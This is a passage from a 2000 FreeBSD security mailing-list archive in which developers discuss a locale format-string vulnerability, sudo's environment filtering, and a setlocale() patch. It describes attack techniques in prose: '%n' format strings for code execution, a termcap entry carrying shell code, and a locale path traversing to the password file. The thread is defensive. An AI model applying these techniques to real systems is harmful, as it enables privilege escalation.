setugid, but which works otherwise (for "debugging purposes" or whatever). If sudo doesnt filter this out, then users who can run 'sudo root safecommand' can also edit any file on the system. IMO, sudo (and all other similar "limited privilege" programs) needs to take a positive filtering approach: disallow all variables by default, except for those on a defined list of allowed variables for that application. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:21:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 1C7B637B422; Thu, 7 Sep 2000 15:21:07 -0700 (PDT) Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87MKnj06972; Thu, 7 Sep 2000 16:20:49 -0600 (MDT) Message-Id: <200009072220.e87MKnj06972@xerxes.courtesan.com> To: Kris Kennaway Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , "Andrey A. Chernov" , Warner Losh , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org Subject: Re: UNIX locale format string vulnerability (fwd) In-reply-to: Your message of "Thu, 07 Sep 2000 15:20:08 PDT." References: Date: Thu, 07 Sep 2000 16:20:49 -0600 From: "Todd C. Miller" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message so spake Kris Kennaway (kris): > IMO, sudo (and all other similar "limited privilege" programs) needs to > take a positive filtering approach: disallow all variables by default, > except for those on a defined list of allowed variables for that > application. Yes, there's really no other way to win the 'battle' if you will. - todd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:23:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 22ED937B423 for ; Thu, 7 Sep 2000 15:23:48 -0700 (PDT) Received: by testbed.baileylink.net (Postfix, from userid 1118) id 7EAFD2C90A; Thu, 7 Sep 2000 17:23:44 -0500 (CDT) Date: Thu, 7 Sep 2000 17:23:43 -0500 From: Brad Guillory To: freebsd-security@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000907172343.F30681@baileylink.net> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <200009072215.e87MFtQ24652@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 07, 2000 at 03:20:08PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The _best_ method would be to convience the OS to run it's own checks on the environment etc just as it would have if it were suid. I can not think of a way to do this. On Thu, Sep 07, 2000 at 03:20:08PM -0700, Kris Kennaway wrote: > On Thu, 7 Sep 2000, Todd C. Miller wrote: > > > Sudo already discards the following: > > This is taking the wrong approach. You can't hope to guess all of the > "magic" environment variables which have special meaning on all platforms > on which sudo may run and implement parallel restrictions in sudo. > > For (a somewhat contrived) example, under Foonix, libc might read a > variable BREAK_TO_EDITOR_ON_EXEC which is ignored when setugid, but which > works otherwise (for "debugging purposes" or whatever). If sudo doesnt > filter this out, then users who can run 'sudo root safecommand' can also > edit any file on the system. > > IMO, sudo (and all other similar "limited privilege" programs) needs to > take a positive filtering approach: disallow all variables by default, > except for those on a defined list of allowed variables for that > application. > > Kris > > -- > In God we Trust -- all others must submit an X.509 certificate. > -- Charles Forsythe > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O | Information wants to be free! | __O Bike _-\<,_ | FreeBSD:The Power to Serve (easily) | _-\<,_ to (_)/ (_) | OpenBSD:The Power to Serve (securely) | (_)/ (_) Work To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:25: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 4859737B422; Thu, 7 Sep 2000 15:24:55 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87MJIg19860; Fri, 8 Sep 2000 02:19:18 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 02:19:17 +0400 From: "Andrey A. Chernov" To: "Todd C. Miller" Cc: Warner Losh , Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908021915.A19655@nagual.pp.ru> References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org> <20000908013556.A19114@nagual.pp.ru> <200009072140.e87Le3715994@xerxes.courtesan.com> <20000908014646.A19231@nagual.pp.ru> <200009072150.e87LoDm26973@xerxes.courtesan.com> <20000908015631.A19316@nagual.pp.ru> <200009072202.e87M2su28507@xerxes.courtesan.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072202.e87M2su28507@xerxes.courtesan.com>; from Todd.Miller@courtesan.com on Thu, Sep 07, 2000 at 04:02:54PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 04:02:54PM -0600, Todd C. Miller wrote: > In message <20000908015631.A19316@nagual.pp.ru> > so spake "Andrey A. Chernov" (ache): > > > Clearing all (or resetting TERMCAP as I suggest) must be done in any case, > > not only if it begins with '/'. The reason is simple - intruder can supply > > bad entry (%-infected) directly in the TERMCAP variable. > > Sorry, I don't buy it. '%' is a perfectly fine (and common) thing > to find in a termcap entry. If you have code that behaves poorly > only termcap entries with '%' in them you've got serious problems... You'll buy it. It will be carefully choosed %p/%s combination with shell code imbedded as \xxx controls directly in termcap entry and passed to tgoto/tparm. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:26:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7AEC637B423; Thu, 7 Sep 2000 15:26:23 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA24626; Thu, 7 Sep 2000 15:26:23 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:26:23 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072144.PAA06367@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : Now, I haven't fully explored to what extent this is possible on FreeBSD - > : I believe the first one is a problem if sudo is used on third party > : applications, but I'm not sure if the second one is, i.e. whether we > : disallow use of '/' in the appropriate locale variables. > > We already disallow this. You can't set your lang to be > ../../../../../../etc/master.password, for example. If the LANG > variable has / in it, it is ignored. I think that the only one that > needs this restriction. I think all of the following can be pointed to arbitrary files as well in setlocale(): "LC_ALL", "LC_COLLATE", "LC_CTYPE", "LC_MONETARY", "LC_NUMERIC", "LC_TIME", "LC_MESSAGES", "LANG" Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:27:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id DE47F37B424; Thu, 7 Sep 2000 15:27:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39531; Thu, 7 Sep 2000 16:27:28 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07066; Thu, 7 Sep 2000 16:27:18 -0600 (MDT) Message-Id: <200009072227.QAA07066@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:26:23 PDT." References: Date: Thu, 07 Sep 2000 16:27:18 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : I think all of the following can be pointed to arbitrary files as well : in setlocale(): : "LANG" LANG cannot. If it contains /, it is ignored. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:32:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B9BF837B423; Thu, 7 Sep 2000 15:32:42 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA25359; Thu, 7 Sep 2000 15:32:42 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:32:42 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072227.QAA07066@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : I think all of the following can be pointed to arbitrary files as well > : in setlocale(): > : "LANG" > > LANG cannot. If it contains /, it is ignored. setlocale(), not catopen(). It is treated on the same footing as all of the others, there. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:33:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sin.core-sdi.com (sin.core-sdi.com [200.49.71.179]) by hub.freebsd.org (Postfix) with ESMTP id B565F37B423 for ; Thu, 7 Sep 2000 15:33:37 -0700 (PDT) Received: from amadeus.servers.core-sdi.com (amadeus.servers.core-sdi.com [192.168.13.3]) by sin.core-sdi.com (Postfix) with ESMTP id 1460A1E04 for ; Thu, 7 Sep 2000 20:09:19 -0300 (ART) Received: (from daemon@localhost) by amadeus.servers.core-sdi.com id BAA14729 for freebsd-security@freebsd.org; Fri, 8 Sep 2000 01:53:05 -0300 From: =?iso-8859-1?Q?Iv=E1n?= Arce Subject: Re: UNIX locale format string vulnerability (fwd) Date: 8 Sep 2000 01:53:05 -0300 Organization: CORE SDI S.A. Lines: 74 Message-ID: <39B81932.F5832679@core-sdi.com> References: <200009072059.OAA05785@harmony.village.org> X-Mailer: Mozilla 4.72 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > In message "Vladimir Mencl, MK, susSED" writes: > : The point is, that if I submitted an evil locale - especially, a locale > : containing formatting strings with "%n"s, and generally with a lot of > : weird formatting characters, I could potentially make that sudo-run > : program execute arbitrary code provided by me - that's what the original > : bugtraq advisory was about, and what I claim that with sudo can be > : exploited on FreeBSD too. > > Ah. I see your point. This is a generic problem then. However, it > is a problem with sudo (which is why I keep adding millert back to the > list of CC'd people). It likely isn't a big problem for reasons I > explained earlier. sudo isn't inteded to be a bulletproof way to give > users the ability to execute N listed commands, as many of those may > have sub commands. Todd can take a stand on this more accuragely. > > : However, the vulnerability is not a buffer overflow, it's only a > : not-properly-checked format string, and creating an exploit only using > : "%n"s would be a really ugly hard work, and I would be trying to avoid > : doing it at any cost.... > > Hmmmm. Maybe this could be done. The proper fix isn't to fix sudo, > of course, but rather to ensure that sufficient arguments are present > to consume the % chars and if not to not do anything. No, the proper fix is to 1. Ensure that SUID programs dont follow user directives of where to take messages with catgets() from. (This is done on FreeBSD base system) AND 2. to ensure that unchecked user suplied data is not passed to printf() functions as the fmt argument. If instead of doing printf(catgets("foo")) you do printf("%s",catgets("foo")) the problem does not appear. Adding checks to GLIBC (like vendors did) solves the problem but that can not replace writing secure code in the first place. The thing is, just the fact that printf() consumes all its arguments does not guarantee that the program will behave as expected if someone plays with the format string, in fact changing "%s%s%s" to "%s%n%n" will take the same number of arguments but the results are quite different. is it exploitable? dunno, depends on the particular program, but one thing is clear, it will not do what it is expected to do -ivan -- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce ==================[ CORE Seguridad de la Informacion S.A. ]========= Iván Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email : iarce@core-sdi.com http://www.core-sdi.com Pte. Juan D. Peron 315 Piso 4 UF 17 1038 Capital Federal Buenos Aires, Argentina. Tel/Fax : +(54-11) 4331-5402 Casilla de Correos 877 (1000) Correo Central ===================================================================== --- For a personal reply use iarce@core-sdi.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:34:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 0F10837B422; Thu, 7 Sep 2000 15:34:31 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39590; Thu, 7 Sep 2000 16:34:27 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07199; Thu, 7 Sep 2000 16:34:17 -0600 (MDT) Message-Id: <200009072234.QAA07199@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:32:42 PDT." References: Date: Thu, 07 Sep 2000 16:34:17 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : On Thu, 7 Sep 2000, Warner Losh wrote: : : > In message Kris Kennaway writes: : > : I think all of the following can be pointed to arbitrary files as well : > : in setlocale(): : > : "LANG" : > : > LANG cannot. If it contains /, it is ignored. : : setlocale(), not catopen(). It is treated on the same footing as all of : the others, there. Ah, it shouldn't :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:37: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 81D9637B422; Thu, 7 Sep 2000 15:36:59 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA25970; Thu, 7 Sep 2000 15:36:59 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:36:59 -0700 (PDT) From: Kris Kennaway To: =?iso-8859-1?Q?Iv=E1n?= Arce Cc: freebsd-security@freebsd.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <39B81932.F5832679@core-sdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 8 Sep 2000, [iso-8859-1] Iv=E1n Arce wrote: > No, the proper fix is to=20 > 1. Ensure that SUID programs dont follow user directives of where > to take messages with catgets() from. (This is done on > FreeBSD base system) > =20 > AND >=20 > 2. to ensure that unchecked user suplied data is not passed > to printf() functions as the fmt argument. >=20 > If instead of doing printf(catgets("foo")) you > do printf("%s",catgets("foo")) the problem does not appear. We're actually talking about something different here. It's only indirectly related to setuid programs and format strings - the real issue is sudo filtering the environment of the program it runs with privileges on behalf of the user. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:42:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 874F937B423; Thu, 7 Sep 2000 15:42:26 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA26781; Thu, 7 Sep 2000 15:42:26 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 7 Sep 2000 15:42:26 -0700 (PDT) From: Kris Kennaway To: Warner Losh Cc: freebsd-security@FreeBSD.org Subject: Re: UNIX locale format string vulnerability (fwd) In-Reply-To: <200009072234.QAA07199@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 7 Sep 2000, Warner Losh wrote: > In message Kris Kennaway writes: > : On Thu, 7 Sep 2000, Warner Losh wrote: > : > : > In message Kris Kennaway writes: > : > : I think all of the following can be pointed to arbitrary files as well > : > : in setlocale(): > : > : "LANG" > : > > : > LANG cannot. If it contains /, it is ignored. > : > : setlocale(), not catopen(). It is treated on the same footing as all of > : the others, there. > > Ah, it shouldn't :-) I didn't spend a lot of time looking at the setlocale() code - could you confirm my interpretation? Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:47:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A5AC937B422; Thu, 7 Sep 2000 15:47:08 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39652; Thu, 7 Sep 2000 16:47:04 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07311; Thu, 7 Sep 2000 16:46:55 -0600 (MDT) Message-Id: <200009072246.QAA07311@harmony.village.org> Subject: Re: UNIX locale format string vulnerability (fwd) Cc: Kris Kennaway , "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org In-reply-to: Your message of "Thu, 07 Sep 2000 16:34:17 MDT." <200009072234.QAA07199@harmony.village.org> References: <200009072234.QAA07199@harmony.village.org> Date: Thu, 07 Sep 2000 16:46:55 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200009072234.QAA07199@harmony.village.org> Warner Losh writes: : : setlocale(), not catopen(). It is treated on the same footing as all of : : the others, there. : : Ah, it shouldn't :-) Index: setlocale.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/lib/libc/locale/setlocale.c,v retrieving revision 1.27 diff -u -r1.27 setlocale.c --- setlocale.c 2000/09/04 03:43:24 1.27 +++ setlocale.c 2000/09/07 22:34:42 @@ -129,7 +129,7 @@ if (!env || !*env) env = getenv("LANG"); - if (!env || !*env) + if (!env || !*env || strchr(env, '/')) env = "C"; (void) strncpy(new_categories[category], env, ENCODING_LEN); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 15:47:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A399337B42C; Thu, 7 Sep 2000 15:47:33 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id QAA39666; Thu, 7 Sep 2000 16:47:32 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA07338; Thu, 7 Sep 2000 16:47:22 -0600 (MDT) Message-Id: <200009072247.QAA07338@harmony.village.org> To: Kris Kennaway Subject: Re: UNIX locale format string vulnerability (fwd) Cc: freebsd-security@FreeBSD.org In-reply-to: Your message of "Thu, 07 Sep 2000 15:42:26 PDT." References: Date: Thu, 07 Sep 2000 16:47:22 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Kris Kennaway writes: : I didn't spend a lot of time looking at the setlocale() code - could you : confirm my interpretation? You are right, but it is a bug, which I just sent a patch for. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 16: 5:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id A385D37B422; Thu, 7 Sep 2000 16:05:08 -0700 (PDT) Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87N4vS20186; Fri, 8 Sep 2000 03:04:57 +0400 (MSD) (envelope-from ache) Date: Fri, 8 Sep 2000 03:03:15 +0400 From: "Andrey A. Chernov" To: Warner Losh Cc: Kris Kennaway , "Todd C. Miller" , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org Subject: Re: UNIX locale format string vulnerability (fwd) Message-ID: <20000908030313.A20166@nagual.pp.ru> References: <200009072234.QAA07199@harmony.village.org> <200009072234.QAA07199@harmony.village.org> <200009072246.QAA07311@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200009072246.QAA07311@harmony.village.org>; from imp@village.org on Thu, Sep 07, 2000 at 04:46:55PM -0600 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 07, 2000 at 04:46:55PM -0600, Warner Losh wrote: > if (!env || !*env) > env = getenv("LANG"); > > - if (!env || !*env) > + if (!env || !*env || strchr(env, '/')) > env = "C"; Ok'ed from me. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:28: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f159.pav1.hotmail.com [64.4.31.159]) by hub.freebsd.org (Postfix) with ESMTP id 6126337B424; Thu, 7 Sep 2000 19:27:58 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Sep 2000 19:27:57 -0700 Received: from 165.247.24.83 by pv1fd.pav1.hotmail.msn.com with HTTP; Fri, 08 Sep 2000 02:27:57 GMT X-Originating-IP: [165.247.24.83] From: "John Doh!" To: security@freebsd.org, hackers@freebsd.org Subject: How to stop problems from printf Date: Thu, 07 Sep 2000 18:27:57 AKDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 08 Sep 2000 02:27:57.0802 (UTC) FILETIME=[66B194A0:01C0193C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello to you am I C coder who to wish write programs we cannot exploit via code such as below. > > main(int argc, char **argv) > { > if(argc > 1) { > printf(gettext("usage: %s filename\n"),argv[0]); > exit(0); > } > printf("normal execution proceeds...\n"); > } Issue is must be getting format string from "untrusted" place, but want to limit substitution of %... to the substitution of say in example the argv[0], but to not do others so that say given "usage: %s filename %p" %p not interpret but to be print instead as literally so we get output of (saying to be argv[0] as test just for example) usage: test filename %p any hints you have I am very greatful for. _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:33:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 8DACE37B424; Thu, 7 Sep 2000 19:33:14 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e882XEv16204; Thu, 7 Sep 2000 19:33:14 -0700 (PDT) Date: Thu, 7 Sep 2000 19:33:14 -0700 From: Alfred Perlstein To: John Doh! Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf Message-ID: <20000907193314.B12231@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from johndoh_@hotmail.com on Thu, Sep 07, 2000 at 06:27:57PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * John Doh! [000907 19:28] wrote: > Hello to you am I C coder who to wish write programs we cannot exploit via > code such as below. > > > > > main(int argc, char **argv) > > { > > if(argc > 1) { > > printf(gettext("usage: %s filename\n"),argv[0]); > > exit(0); > > } > > printf("normal execution proceeds...\n"); > > } > > Issue is must be getting format string from "untrusted" place, but want to > limit substitution of %... to the substitution of say in example the > argv[0], but to not do others so that say given "usage: %s filename %p" %p > not interpret but to be print instead as literally so we get output of > (saying to be argv[0] as test just for example) usage: test filename %p > > any hints you have I am very greatful for. try "%%p" -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 7 19:37:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f151.pav1.hotmail.com [64.4.31.151]) by hub.freebsd.org (Postfix) with ESMTP id AC76937B42C; Thu, 7 Sep 2000 19:37:34 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 7 Sep 2000 19:37:34 -0700 Received: from 165.247.24.83 by pv1fd.pav1.hotmail.msn.com with HTTP; Fri, 08 Sep 2000 02:37:34 GMT X-Originating-IP: [165.247.24.83] From: "John Doh!" To: bright@wintelcom.net Cc: security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: How to stop problems from printf Date: Thu, 07 Sep 2000 18:37:34 AKDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 08 Sep 2000 02:37:34.0507 (UTC) FILETIME=[BE6FC7B0:01C0193D] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >From: Alfred Perlstein >To: John Doh! >CC: security@FreeBSD.ORG, hackers@FreeBSD.ORG >Subject: Re: How to stop problems from printf >Date: Thu, 7 Sep 2000 19:33:14 -0700 > >* John Doh! [000907 19:28] wrote: > > Hello to you am I C coder who to wish write programs we cannot exploit >via > > code such as below. > > > > > > > > main(int argc, char **argv) > > > { > > > if(argc > 1) { > > > printf(gettext("usage: %s filename\n"),argv[0]); > > > exit(0); > > > } > > > printf("normal execution proceeds...\n"); > > > } > > > > Issue is must be getting format string from "untrusted" place, but want >to > > limit substitution of %... to the substitution of say in example the > > argv[0], but to not do others so that say given "usage: %s filename %p" >%p > > not interpret but to be print instead as literally so we get output of > > (saying to be argv[0] as test just for example) usage: test filename %p > > > > any hints you have I am very greatful for. > >try "%%p" > >-Alfred That is what I would do if I could always control string, but point is input string is not trusted...how to either validate or else to have printf limit to its arguments. Any ideas? _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com. 